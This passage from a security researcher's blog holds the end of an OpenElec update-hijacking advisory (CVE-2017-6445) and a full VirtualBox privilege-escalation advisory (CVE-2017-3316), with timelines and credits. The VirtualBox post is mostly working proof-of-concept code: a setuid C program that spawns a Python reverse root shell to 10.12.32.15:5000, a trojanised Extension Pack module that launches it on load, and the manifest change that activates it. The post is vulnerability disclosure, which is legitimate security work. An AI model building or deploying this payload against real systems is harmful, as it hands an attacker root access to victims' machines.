#007800;">$OPENELEC</span>     <span style="color: #7a0874; font-weight: bold;">test</span> <span style="color: #660033;">-d</span> <span style="color: #007800;">$TMP</span><span style="color: #000000; font-weight: bold;">/</span>unpacked <span style="color: #000000; font-weight: bold;">&amp;&amp;</span> <span style="color: #c20cb9; font-weight: bold;">rm</span> <span style="color: #660033;">-fr</span> <span style="color: #007800;">$TMP</span><span style="color: #000000; font-weight: bold;">/</span>unpacked <span style="color: #7a0874; font-weight: bold;">test</span> <span style="color: #660033;">-d</span> <span style="color: #007800;">$OPENELEC</span> <span style="color: #000000; font-weight: bold;">&amp;&amp;</span> <span style="color: #c20cb9; font-weight: bold;">rm</span> <span style="color: #660033;">-rf</span> <span style="color: #007800;">$OPENELEC</span></pre></div> <h3>Mitigation</h3> <p>Ensure that auto-update is disabled.</p> <h3>Timeline</h3> <ul><li>This bug was reported on December 03 2016.</li> <li>Published as Zero-Day after no reply from OpenElec on March 04 2017</li> </ul><h3>Credits</h3> <p>CVE-2017-6445 was discovered by Wolfgang Hotwagner (<a href="https://tech.feedyourhead.at/content/openelec-remote-code-execution-vulnerability-through-man-in-the-middle">https://tech.feedyourhead.at/content/openelec-remote-code-execution-vulnerability-through-man-in-the-middle)</a></p> </div> <span class="field field--name-uid field--type-entity-reference field--label-hidden"><span lang="" about="/users/hoti" typeof="schema:Person" property="schema:name" datatype="">Hoti</span></span> <span class="field field--name-created field--type-created field--label-hidden">Mar 03 2017</span> <div class="field field--name-field-tagies field--type-entity-reference field--label-above"> <div class="field__label">Tags</div> <div class='field__items'> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/openelec" hreflang="en">OpenElec</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/security" hreflang="en">Security</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/taxonomy/term/107" hreflang="en">CVE</a></div> </div> </div> <section class="field field--name-comment-node-blog field--type-comment field--label-hidden comment-wrapper"> </section> <section class="field field--name-comment field--type-comment field--label-above comment-wrapper"> <h2 class='title comment-form__title'> <i class="fa fa-comments-o"></i> Add new comment</h2> <drupal-render-placeholder callback="comment.lazy_builders:renderForm" arguments="0=node&amp;1=231&amp;2=comment&amp;3=comment" token="ElyHFr1PfrXWDF1Kma0FRnCJYIiGEcsnbiSxleu3sHc"></drupal-render-placeholder> </section> Fri, 03 Mar 2017 21:17:42 +0000 Hoti 231 at https://tech.feedyourhead.at Privilege Escalation in VirtualBox (CVE-2017-3316) https://tech.feedyourhead.at/content/privilege-escalation-in-virtualbox-cve-2017-3316 <span class="field field--name-title field--type-string field--label-hidden">Privilege Escalation in VirtualBox (CVE-2017-3316)</span> <div class="clearfix text-formatted field field--name-body field--type-text-with-summary field--label-hidden field__item"><h3>Overview</h3> <ul> <li>System affected: VirtualBox</li> <li>Software-Version: prior to 5.0.32, prior to 5.1.14</li> <li>User-Interaction: Required</li> <li>Impact: A Man-In-The-Middle could infiltrate an Extension-Pack-Update to gain a root-shell</li> </ul> <h3>Detailed description</h3> <p>In my research about update mechanism of open-source software I found vulnerabilities in Oracle's VirtualBox. It's possible to compromise a system behind a firewall by infiltrating the updates of Extension-Packs because of the following flaws:</p> <ol> <li>The Extension-Pack is updated via HTTP instead of HTTPS. The Extension-Packs are not signed, so a Man-In-The-Middle could send his own Extension-Pack(with malicous code included) instead of the regular update to the target. The Code would be executed with user-permissions. I reported this bug to Oracle but I think someone else discovered and reported it before. This bug also affects VirtualBox prior to 5.0.32, prior to 5.1.14. I don't know the CVE.</li> <li>CVE-2017-3316: There is a privilege escalation bug in the downloader of VirtualBox. Extension-Packs are tar-archives. Tar-archives can preserve permissions.&nbsp; A Man-In-The-Middle could include an executable with setuid-permissions to the Extension-Pack. If the victim downloads the Ext-pack, it will be stored as owner root and without checking the permissions of the binaries. This bug affects VirtualBox prior to 5.0.32, prior to 5.1.14</li> </ol> <h3>Proof-Of-Concept</h3> <p>The executeable of the following code is placed in the Extension-Pack-Archive under <em>linux.amd64/evil</em> with <strong>setuid</strong>.</p> <pre> <div class="geshifilter"><pre class="c geshifilter-c" style="font-family:monospace;"><span style="color: #808080; font-style: italic;">/* evil.c(executable with the reverse-shell) */</span> <span style="color: #339933;">#include &lt;unistd.h&gt;</span> &nbsp; <span style="color: #993333;">int</span> main<span style="color: #009900;">&#40;</span><span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#123;</span> setuid<span style="color: #009900;">&#40;</span><span style="color: #0000dd;">0</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> execl<span style="color: #009900;">&#40;</span><span style="color: #ff0000;">&quot;/usr/bin/python&quot;</span><span style="color: #339933;">,</span><span style="color: #ff0000;">&quot;python&quot;</span><span style="color: #339933;">,</span><span style="color: #ff0000;">&quot;-c&quot;</span><span style="color: #339933;">,</span><span style="color: #ff0000;">&quot;import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((<span style="color: #000099; font-weight: bold;">\&quot;</span>10.12.32.15<span style="color: #000099; font-weight: bold;">\&quot;</span>,5000));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([<span style="color: #000099; font-weight: bold;">\&quot;</span>/bin/bash<span style="color: #000099; font-weight: bold;">\&quot;</span>,<span style="color: #000099; font-weight: bold;">\&quot;</span>-i<span style="color: #000099; font-weight: bold;">\&quot;</span>]);&quot;</span><span style="color: #339933;">,</span>NULL<span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <span style="color: #b1b100;">return</span> <span style="color: #0000dd;">0</span><span style="color: #339933;">;</span> <span style="color: #009900;">&#125;</span></pre></div></pre> <p>Next the&nbsp; VirtualBox-Sources are downloaded and the following code has to be placed under src/VBox/ExtPacks/Evil/VBoxEvilMain.cpp:</p> <pre> <div class="geshifilter"><pre class="c geshifilter-c" style="font-family:monospace;"><span style="color: #808080; font-style: italic;">/* $Id: VBoxEvilMain.cpp $ */</span> <span style="color: #808080; font-style: italic;">/** @file * Evil main module. */</span> &nbsp; <span style="color: #808080; font-style: italic;">/* * Copyright (C) 2010-2016 Oracle Corporation * * Permission is hereby granted, free of charge, to any person * obtaining a copy of this software and associated documentation * files (the &quot;Software&quot;), to deal in the Software without * restriction, including without limitation the rights to use, * copy, modify, merge, publish, distribute, sublicense, and/or sell * copies of the Software, and to permit persons to whom the * Software is furnished to do so, subject to the following * conditions: * * The above copyright notice and this permission notice shall be * included in all copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED &quot;AS IS&quot;, WITHOUT WARRANTY OF ANY KIND, * EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES * OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND * NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT * HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, * WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING * FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR * OTHER DEALINGS IN THE SOFTWARE. */</span> &nbsp; <span style="color: #339933;">#include &lt;VBox/ExtPack/ExtPack.h&gt;</span> &nbsp; <span style="color: #339933;">#include &lt;VBox/err.h&gt;</span> <span style="color: #339933;">#include &lt;VBox/version.h&gt;</span> <span style="color: #339933;">#include &lt;VBox/vmm/cfgm.h&gt;</span> <span style="color: #339933;">#include &lt;iprt/string.h&gt;</span> <span style="color: #339933;">#include &lt;iprt/param.h&gt;</span> <span style="color: #339933;">#include &lt;iprt/path.h&gt;</span> &nbsp; &nbsp; &nbsp; <span style="color: #993333;">static</span> PCVBOXEXTPACKHLP g_pHlp<span style="color: #339933;">;</span> &nbsp; <span style="color: #993333;">static</span> <span style="color: #993333;">const</span> VBOXEXTPACKREG g_vboxEvilExtPackReg <span style="color: #339933;">=</span> <span style="color: #009900;">&#123;</span> VBOXEXTPACKREG_VERSION<span style="color: #339933;">,</span> <span style="color: #808080; font-style: italic;">/* .uVBoxFullVersion = */</span> VBOX_FULL_VERSION<span style="color: #339933;">,</span> <span style="color: #808080; font-style: italic;">/* .pfnInstalled = */</span> NULL<span style="color: #339933;">,</span> <span style="color: #808080; font-style: italic;">/* .pfnUninstall = */</span> NULL<span style="color: #339933;">,</span> <span style="color: #808080; font-style: italic;">/* .pfnVirtualBoxReady =*/</span> NULL<span style="color: #339933;">,</span> <span style="color: #808080; font-style: italic;">/* .pfnConsoleReady = */</span> NULL<span style="color: #339933;">,</span> <span style="color: #808080; font-style: italic;">/* .pfnUnload = */</span> NULL<span style="color: #339933;">,</span> <span style="color: #808080; font-style: italic;">/* .pfnVMCreated = */</span> NULL<span style="color: #339933;">,</span> <span style="color: #808080; font-style: italic;">/* .pfnVMConfigureVMM = */</span> NULL<span style="color: #339933;">,</span> <span style="color: #808080; font-style: italic;">/* .pfnVMPowerOn = */</span> NULL<span style="color: #339933;">,</span> <span style="color: #808080; font-style: italic;">/* .pfnVMPowerOff = */</span> NULL<span style="color: #339933;">,</span> <span style="color: #808080; font-style: italic;">/* .pfnQueryObject = */</span> NULL<span style="color: #339933;">,</span> <span style="color: #808080; font-style: italic;">/* .pfnReserved1 = */</span> NULL<span style="color: #339933;">,</span> <span style="color: #808080; font-style: italic;">/* .pfnReserved2 = */</span> NULL<span style="color: #339933;">,</span> <span style="color: #808080; font-style: italic;">/* .pfnReserved3 = */</span> NULL<span style="color: #339933;">,</span> <span style="color: #808080; font-style: italic;">/* .pfnReserved4 = */</span> NULL<span style="color: #339933;">,</span> <span style="color: #808080; font-style: italic;">/* .pfnReserved5 = */</span> NULL<span style="color: #339933;">,</span> <span style="color: #808080; font-style: italic;">/* .pfnReserved6 = */</span> NULL<span style="color: #339933;">,</span> <span style="color: #808080; font-style: italic;">/* .u32Reserved7 = */</span> <span style="color: #0000dd;">0</span><span style="color: #339933;">,</span> VBOXEXTPACKREG_VERSION <span style="color: #009900;">&#125;</span><span style="color: #339933;">;</span> &nbsp; <span style="color: #339933;">#include &lt;unistd.h&gt;</span> <span style="color: #808080; font-style: italic;">/** @callback_method_impl{FNVBOXEXTPACKREGISTER} */</span> <span style="color: #000000; font-weight: bold;">extern</span> <span style="color: #ff0000;">&quot;C&quot;</span> DECLEXPORT<span style="color: #009900;">&#40;</span><span style="color: #993333;">int</span><span style="color: #009900;">&#41;</span> VBoxExtPackRegister<span style="color: #009900;">&#40;</span>PCVBOXEXTPACKHLP pHlp<span style="color: #339933;">,</span> PCVBOXEXTPACKREG <span style="color: #339933;">*</span>ppReg<span style="color: #339933;">,</span> PRTERRINFO pErrInfo<span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#123;</span> &nbsp; pid_t pid <span style="color: #339933;">=</span> fork<span style="color: #009900;">&#40;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <span style="color: #b1b100;">if</span><span style="color: #009900;">&#40;</span>pid <span style="color: #339933;">==</span> <span style="color: #0000dd;">0</span><span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#123;</span> execl<span style="color: #009900;">&#40;</span><span style="color: #ff0000;">&quot;/usr/lib/virtualbox/ExtensionPacks/Oracle_VM_VirtualBox_Extension_Pack/linux.amd64/evil&quot;</span><span style="color: #339933;">,</span><span style="color: #ff0000;">&quot;evil&quot;</span><span style="color: #339933;">,</span>NULL<span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <span style="color: #009900;">&#125;</span> <span style="color: #808080; font-style: italic;">/* * Check the VirtualBox version. */</span> <span style="color: #b1b100;">if</span> <span style="color: #009900;">&#40;</span><span style="color: #339933;">!</span>VBOXEXTPACK_IS_VER_COMPAT<span style="color: #009900;">&#40;</span>pHlp<span style="color: #339933;">-&gt;</span>u32Version<span style="color: #339933;">,</span> VBOXEXTPACKHLP_VERSION<span style="color: #009900;">&#41;</span><span style="color: #009900;">&#41;</span> <span style="color: #b1b100;">return</span> RTErrInfoSetF<span style="color: #009900;">&#40;</span>pErrInfo<span style="color: #339933;">,</span> VERR_VERSION_MISMATCH<span style="color: #339933;">,</span> <span style="color: #ff0000;">&quot;Helper version mismatch - expected %#x got %#x&quot;</span><span style="color: #339933;">,</span> VBOXEXTPACKHLP_VERSION<span style="color: #339933;">,</span> pHlp<span style="color: #339933;">-&gt;</span>u32Version<span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <span style="color: #b1b100;">if</span> <span style="color: #009900;">&#40;</span> VBOX_FULL_VERSION_GET_MAJOR<span style="color: #009900;">&#40;</span>pHlp<span style="color: #339933;">-&gt;</span>uVBoxFullVersion<span style="color: #009900;">&#41;</span> <span style="color: #339933;">!=</span> VBOX_VERSION_MAJOR <span style="color: #339933;">||</span> VBOX_FULL_VERSION_GET_MINOR<span style="color: #009900;">&#40;</span>pHlp<span style="color: #339933;">-&amp;</span>gt<span style="color: #339933;">;</span>uVBoxFullVersion<span style="color: #009900;">&#41;</span> <span style="color: #339933;">!=</span> VBOX_VERSION_MINOR<span style="color: #009900;">&#41;</span> <span style="color: #b1b100;">return</span> RTErrInfoSetF<span style="color: #009900;">&#40;</span>pErrInfo<span style="color: #339933;">,</span> VERR_VERSION_MISMATCH<span style="color: #339933;">,</span> <span style="color: #ff0000;">&quot;VirtualBox version mismatch - expected %u.%u got %u.%u&quot;</span><span style="color: #339933;">,</span> VBOX_VERSION_MAJOR<span style="color: #339933;">,</span> VBOX_VERSION_MINOR<span style="color: #339933;">,</span> VBOX_FULL_VERSION_GET_MAJOR<span style="color: #009900;">&#40;</span>pHlp<span style="color: #339933;">-&gt;</span>uVBoxFullVersion<span style="color: #009900;">&#41;</span><span style="color: #339933;">,</span> VBOX_FULL_VERSION_GET_MINOR<span style="color: #009900;">&#40;</span>pHlp<span style="color: #339933;">-&gt;</span>uVBoxFullVersion<span style="color: #009900;">&#41;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> &nbsp; <span style="color: #808080; font-style: italic;">/* * We're good, save input and return the registration structure. */</span> g_pHlp <span style="color: #339933;">=</span> pHlp<span style="color: #339933;">;</span> <span style="color: #339933;">*</span>ppReg <span style="color: #339933;">=</span> <span style="color: #339933;">&amp;</span>g_vboxEvilExtPackReg<span style="color: #339933;">;</span> &nbsp; <span style="color: #b1b100;">return</span> VINF_SUCCESS<span style="color: #339933;">;</span> <span style="color: #009900;">&#125;</span></pre></div></pre> <p>After compiling, this Extension-Pack-Module is placed in the Archive under linux.amd64/VBoxEvilMain.so. It's also necessary to modify the ExtPack.xml so that the Evil-Module is used:</p> <pre> <div class="geshifilter"><pre class="xml geshifilter-xml" style="font-family:monospace;"><span style="color: #808080; font-style: italic;">&lt;!--?xml version=&quot;1.0&quot;?--&gt;</span> <span style="color: #009900;"><span style="color: #000000; font-weight: bold;">&lt;virtualboxextensionpack</span> <span style="color: #000066;">version</span>=<span style="color: #ff0000;">&quot;1.0&quot;</span> <span style="color: #000066;">xmlns</span>=<span style="color: #ff0000;">&quot;http://www.virtualbox.org/VirtualBoxExtensionPack&quot;</span><span style="color: #000000; font-weight: bold;">&gt;</span></span> <span style="color: #009900;"><span style="color: #000000; font-weight: bold;">&lt;name<span style="color: #000000; font-weight: bold;">&gt;</span></span></span>Oracle VM VirtualBox Extension Pack<span style="color: #009900;"><span style="color: #000000; font-weight: bold;">&lt;/name<span style="color: #000000; font-weight: bold;">&gt;</span></span></span> <span style="color: #009900;"><span style="color: #000000; font-weight: bold;">&lt;description<span style="color: #000000; font-weight: bold;">&gt;</span></span></span>USB 2.0 and USB 3.0 Host Controller, Host Webcam, VirtualBox RDP, PXE ROM, Disk Encryption.<span style="color: #009900;"><span style="color: #000000; font-weight: bold;">&lt;/description<span style="color: #000000; font-weight: bold;">&gt;</span></span></span> <span style="color: #009900;"><span style="color: #000000; font-weight: bold;">&lt;version</span> <span style="color: #000066;">revision</span>=<span style="color: #ff0000;">&quot;112026&quot;</span><span style="color: #000000; font-weight: bold;">&gt;</span></span>5.1.10<span style="color: #009900;"><span style="color: #000000; font-weight: bold;">&lt;/version<span style="color: #000000; font-weight: bold;">&gt;</span></span></span> <span style="color: #009900;"><span style="color: #000000; font-weight: bold;">&lt;mainmodule<span style="color: #000000; font-weight: bold;">&gt;</span></span></span>VBoxEvilMain<span style="color: #009900;"><span style="color: #000000; font-weight: bold;">&lt;/mainmodule<span style="color: #000000; font-weight: bold;">&gt;</span></span></span> <span style="color: #009900;"><span style="color: #000000; font-weight: bold;">&lt;vrdemodule<span style="color: #000000; font-weight: bold;">&gt;</span></span></span>VBoxVRDP<span style="color: #009900;"><span style="color: #000000; font-weight: bold;">&lt;/vrdemodule<span style="color: #000000; font-weight: bold;">&gt;</span></span></span> <span style="color: #009900;"><span style="color: #000000; font-weight: bold;">&lt;showlicense<span style="color: #000000; font-weight: bold;">&gt;</span></span></span> <span style="color: #009900;"><span style="color: #000000; font-weight: bold;">&lt;/showlicense<span style="color: #000000; font-weight: bold;">&gt;</span></span><span style="color: #000000; font-weight: bold;">&lt;/virtualboxextensionpack<span style="color: #000000; font-weight: bold;">&gt;</span></span></span></pre></div></pre> <p>Note: To make this Extension-Pack valid it is necessary to add all the file-checksumms to ExtPack.manifest. The victim will be asked for the root password during the update. If the attacker sends this malicious Extension-Pack, a reverse root-shell will be executed.</p> <h3>Timeline</h3> <p>This bug was reported in December. Oracle answered on the same day and gave status reports regularly. <a href="http://www.oracle.com/technetwork/security-advisory/cpujan2017-2881727.html">They released a patch on January 17th</a>.</p> <h3>Credits</h3> <p>CVE-2017-3316 was discovered by Wolfgang Hotwagner (https://tech.feedyourhead.at/content/privilege-escalation-in-virtualbox-cve-2017-3316)</p> </div> <span class="field field--name-uid field--type-entity-reference field--label-hidden"><span lang="" about="/users/hoti" typeof="schema:Person" property="schema:name" datatype="">Hoti</span></span> <span class="field field--name-created field--type-created field--label-hidden">Jan 26 2017</span> <div class="field field--name-field-tagies field--type-entity-reference field--label-above"> <div class="field__label">Tags</div> <div class='field__items'> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/security" hreflang="en">Security</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/virtualization" hreflang="en">Virtualization</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/taxonomy/term/107" hreflang="en">CVE</a></div> </div> </div> <section class="field field--name-comment-node-blog field--type-comment field--label-hidden comment-wrapper"> </section> <section class="field field--name-comment field--type-comment field--label-above comment-wrapper"> <h2 class='title comment-form__title'> <i class="fa fa-comments-o"></i> Add new comment</h2> <drupal-render-placeholder callback="comment.lazy_builders:renderForm" arguments="0=node&amp;1=226&amp;2=comment&amp;3=comment" token="6C7ozEZKYgLTsdbAg1O0c_tnZgwG3mekhRWL4oAYL0M"></drupal-render-placeholder> </section> Thu, 26 Jan 2017 21:58:38 +0000 Hoti 226 at https://tech.feedyourhead.at